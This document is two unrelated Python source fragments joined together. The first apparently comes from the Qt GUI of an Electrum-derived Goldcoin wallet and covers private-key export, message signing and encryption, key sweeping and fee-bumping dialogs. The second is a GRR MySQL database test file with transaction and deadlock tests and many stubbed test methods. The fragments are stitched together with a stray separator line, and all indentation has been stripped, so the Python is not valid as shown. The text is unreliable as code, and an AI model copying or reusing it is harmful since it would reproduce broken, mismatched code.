d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Goldcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Goldcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
def cb(success: bool, error: str, data):
if not success:
if error:
self.show_error(error)
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
scan_qrcode(parent=self.top_level_window(), config=self.config, callback=cb)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# note that closeEvent is NOT called if the user quits with Ctrl-C
self.clean_up()
event.accept()
def clean_up(self):
if self._cleaned_up:
return
self._cleaned_up = True
if self.wallet.thread:
self.wallet.thread.stop()
self.wallet.thread = None
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
if self._update_check_thread:
self._update_check_thread.exit()
self._update_check_thread.wait()
if self.tray:
self.tray = None
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = _(
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(msg))
msg2 = _("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(msg2))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb: Optional[int]) -> Optional[int]:
if fee_per_kb is None:
return None
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = round(fee)
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = BumpFeeDialog(main_window=self, tx=tx, txid=txid)
d.run()
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = DSCancelDialog(main_window=self, tx=tx, txid=txid)
d.run()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
mysql_test.py
|
#!/usr/bin/env python
from __future__ import unicode_literals
import logging
import os
import random
import string
import threading
import unittest
from builtins import range # pylint: disable=redefined-builtin
import MySQLdb # TODO(hanuszczak): This should be imported conditionally.
import unittest
from grr_response_server import db_test_mixin
from grr_response_server import db_utils
from grr_response_server.databases import mysql
from grr.test_lib import stats_test_lib
def _GetEnvironOrSkip(key):
value = os.environ.get(key)
if value is None:
raise unittest.SkipTest("'%s' variable is not set" % key)
return value
class TestMysqlDB(stats_test_lib.StatsTestMixin,
db_test_mixin.DatabaseTestMixin, unittest.TestCase):
"""Test the mysql.MysqlDB class.
Most of the tests in this suite are general blackbox tests of the db.Database
interface brought in by the db_test.DatabaseTestMixin.
"""
def CreateDatabase(self):
# pylint: disable=unreachable
user = _GetEnvironOrSkip("MYSQL_TEST_USER")
host = _GetEnvironOrSkip("MYSQL_TEST_HOST")
port = _GetEnvironOrSkip("MYSQL_TEST_PORT")
passwd = _GetEnvironOrSkip("MYSQL_TEST_PASS")
dbname = "".join(
random.choice(string.ascii_uppercase + string.digits)
for _ in range(10))
connection = MySQLdb.Connect(host=host, port=port, user=user, passwd=passwd)
cursor = connection.cursor()
cursor.execute("CREATE DATABASE " + dbname)
logging.info("Created test database: %s", dbname)
conn = mysql.MysqlDB(
host=host, port=port, user=user, passwd=passwd, db=dbname)
def Fin():
cursor.execute("DROP DATABASE " + dbname)
cursor.close()
connection.close()
conn.Close()
return conn, Fin
# pylint: enable=unreachable
def testIsRetryable(self):
self.assertFalse(mysql._IsRetryable(Exception("Some general error.")))
self.assertFalse(
mysql._IsRetryable(
MySQLdb.OperationalError(
1416, "Cannot get geometry object from data...")))
self.assertTrue(
mysql._IsRetryable(
MySQLdb.OperationalError(
1205, "Lock wait timeout exceeded; try restarting...")))
self.assertTrue(
mysql._IsRetryable(
MySQLdb.OperationalError(
1213,
"Deadlock found when trying to get lock; try restarting...")))
self.assertTrue(
mysql._IsRetryable(
MySQLdb.OperationalError(
1637, "Too many active concurrent transactions")))
def AddUser(self, connection, user, passwd):
cursor = connection.cursor()
cursor.execute("INSERT INTO grr_users (username, password) VALUES (%s, %s)",
(user, bytes(passwd)))
cursor.close()
def ListUsers(self, connection):
cursor = connection.cursor()
cursor.execute("SELECT username, password FROM grr_users")
ret = cursor.fetchall()
cursor.close()
return ret
def setUp(self):
super(TestMysqlDB, self).setUp()
db_utils.DBMetricsInit().RunOnce()
def testRunInTransaction(self):
self.db.delegate._RunInTransaction(
lambda con: self.AddUser(con, "AzureDiamond", "hunter2"))
users = self.db.delegate._RunInTransaction(self.ListUsers, readonly=True)
self.assertEqual(users, ((u"AzureDiamond", "hunter2"),))
def testRunInTransactionDeadlock(self):
"""A deadlock error should be retried."""
self.db.delegate._RunInTransaction(
lambda con: self.AddUser(con, "user1", "pw1"))
self.db.delegate._RunInTransaction(
lambda con: self.AddUser(con, "user2", "pw2"))
# We'll start two transactions which read/modify rows in different orders.
# This should force (at least) one to fail with a deadlock, which should be
# retried.
t1_halfway = threading.Event()
t2_halfway = threading.Event()
# Number of times each transaction is attempted.
counts = [0, 0]
def Transaction1(connection):
counts[0] += 1
cursor = connection.cursor()
cursor.execute(
"SELECT password FROM grr_users WHERE username = 'user1' FOR UPDATE;")
t1_halfway.set()
self.assertTrue(t2_halfway.wait(5))
cursor.execute("UPDATE grr_users SET password = 'pw2-updated' "
"WHERE username = 'user2';")
cursor.close()
def Transaction2(connection):
counts[1] += 1
cursor = connection.cursor()
cursor.execute(
"SELECT password FROM grr_users WHERE username = 'user2' FOR UPDATE;")
t2_halfway.set()
self.assertTrue(t1_halfway.wait(5))
cursor.execute("UPDATE grr_users SET password = 'pw1-updated' "
"WHERE username = 'user1';")
cursor.close()
thread_1 = threading.Thread(
target=lambda: self.db.delegate._RunInTransaction(Transaction1))
thread_2 = threading.Thread(
target=lambda: self.db.delegate._RunInTransaction(Transaction2))
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
# Both transaction should have succeeded
users = self.db.delegate._RunInTransaction(self.ListUsers, readonly=True)
self.assertEqual(users, ((u"user1", "pw1-updated"),
(u"user2", "pw2-updated")))
# At least one should have been retried.
self.assertGreater(sum(counts), 2)
def testSuccessfulCallsAreCorrectlyAccounted(self):
with self.assertStatsCounterDelta(
1, "db_request_latency", fields=["ReadAllGRRUsers"]):
self.db.ReadAllGRRUsers()
# Tests that we don't expect to pass yet.
# TODO(user): Finish implementation and enable these tests.
def testWritePathInfosRawValidates(self):
pass
def testWritePathInfosValidatesClient(self):
pass
def testWritePathInfosMetadata(self):
pass
def testWritePathInfosMetadataTimestampUpdate(self):
pass
def testWritePathInfosStatEntry(self):
pass
def testWritePathInfosExpansion(self):
pass
def testWritePathInfosTypeSeparated(self):
pass
def testWritePathInfosUpdates(self):
pass
def testWritePathInfosUpdatesAncestors(self):
pass
def testMultiWritePathInfos(self):
pass
def testWriteStatHistory(self):
pass
def testWriteHashHistory(self):
pass
def testMultiWriteHistoryEmpty(self):
pass
def testMultiWriteHistoryStatAndHash(self):
pass
def testMultiWriteHistoryTwoPathTypes(self):
pass
def testMultiWriteHistoryTwoPaths(self):
pass
def testMultiWriteHistoryTwoClients(self):
pass
def testMultiWriteHistoryDoesNotAllowOverridingStat(self):
pass
def testMultiWriteHistoryDoesNotAllowOverridingHash(self):
pass
def testMultiWriteHistoryRaisesOnNonExistingPathsForStat(self):
pass
def testMultiWriteHistoryRaisesOnNonExistingPathForHash(self):
pass
def testReadPathInfosNonExistent(self):
pass
def testReadPathInfoNonExistent(self):
pass
def testReadPathInfoTimestampStatEntry(self):
pass
def testReadPathInfosMany(self):
pass
def testWritePathInfosDuplicatedData(self):
pass
def testWritePathInfosStoresCopy(self):
pass
def testListDescendentPathInfosEmptyResult(self):
pass
def testListDescendentPathInfosSingleResult(self):
pass
def testListDescendentPathInfosSingle(self):
pass
def testListDescendentPathInfosBranching(self):
pass
def testListDescendentPathInfosLimited(self):
pass
def testListDescendentPathInfosTypeSeparated(self):
pass
def testListDescendentPathInfosAll(self):
pass
def testListDescendentPathInfosLimitedDirectory(self):
pass
def testListChildPathInfosRoot(self):
pass
def testListChildPathInfosDetails(self):
pass
def testListChildPathInfosDeepSorted(self):
pass
# TODO(hanuszczak): Remove these once support for storing file hashes in
# the MySQL backend is ready.
def testWritePathInfosHashEntry(self):
pass
def testWritePathInfosHashAndStatEntry(self):
pass
def testWritePathInfoHashAndStatEntrySeparateWrites(self):
pass
def testReadPathInfoTimestampHashEntry(self):
pass
def testReadPathInfoTimestampStatAndHashEntry(self):
pass
def testReadingNonExistentBlobReturnsNone(self):
pass
def testSingleBlobCanBeWrittenAndThenRead(self):
pass
def testMultipleBlobsCanBeWrittenAndThenRead(self):
pass
def testWriting80MbOfBlobsWithSingleCallWorks(self):
pass
def testCheckBlobsExistCorrectlyReportsPresentAndMissingBlobs(self):
pass
def testHashBlobReferenceCanBeWrittenAndReadBack(self):
pass
